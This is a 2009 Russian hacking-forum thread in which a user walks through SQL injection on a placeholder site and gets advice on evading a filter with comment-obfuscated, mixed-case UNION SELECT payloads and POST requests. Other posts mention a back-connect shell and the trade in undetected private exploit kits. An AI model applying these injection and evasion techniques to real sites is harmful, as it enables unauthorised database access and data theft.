ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.10.2009, 19:36
|
|
Новичок
Регистрация: 03.10.2009
Сообщений: 18
Провел на форуме:
190772
Репутация:
5
|
|
Сообщение от mailbrush
Почему же? Я уже и бекконнект сделал  странно,у меня есть и логин и пасс, но чёт не пускает)
|
|
|
08.10.2009, 19:38
|
|
Новичок
Регистрация: 03.10.2009
Сообщений: 18
Провел на форуме:
190772
Репутация:
5
|
|
Сообщение от mailbrush
Почему же? Я уже и бекконнект сделал всё работает)спс биг)эт я напутал)))
|
|
|
|
08.10.2009, 23:31
|
|
Новичок
Регистрация: 08.10.2009
Сообщений: 1
Провел на форуме:
3623
Репутация:
0
|
|
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Последний раз редактировалось smtgr; 08.10.2009 в 23:34..
|
|
|
|
09.10.2009, 01:13
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
попробуй покрутить как слепую скуль.
|
|
|
|
09.10.2009, 05:44
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
В зависимости от конкретной ситуации... дай реальный пример...
|
|
|
|
09.10.2009, 07:16
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
-12/**/ANd/**/1=2/**/uNioN/**/SeLecT/**/1,2,3/*
Попробуй так что ле...
Без пример сложновато 
|
|
|
|
09.10.2009, 11:46
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Существуют ли бесплатные связки эксплоитов?
Если да, то какие лежат в паблике?
|
|
|
|
09.10.2009, 12:41
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от SeNaP
Существуют ли бесплатные связки эксплоитов?
Если да, то какие лежат в паблике?
В паблике такие связки, которые паляться антивирусами.
А в привате, за очень неплохие деньги, антивирами не будет палиться, и распуститься быстро.
|
|
|
|
09.10.2009, 13:00
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Прив связки не так то и сложно достать...
|
|
|
|
09.10.2009, 15:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Возможно Apache с mod_security, по обходу, попробуй POST'ом послать.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
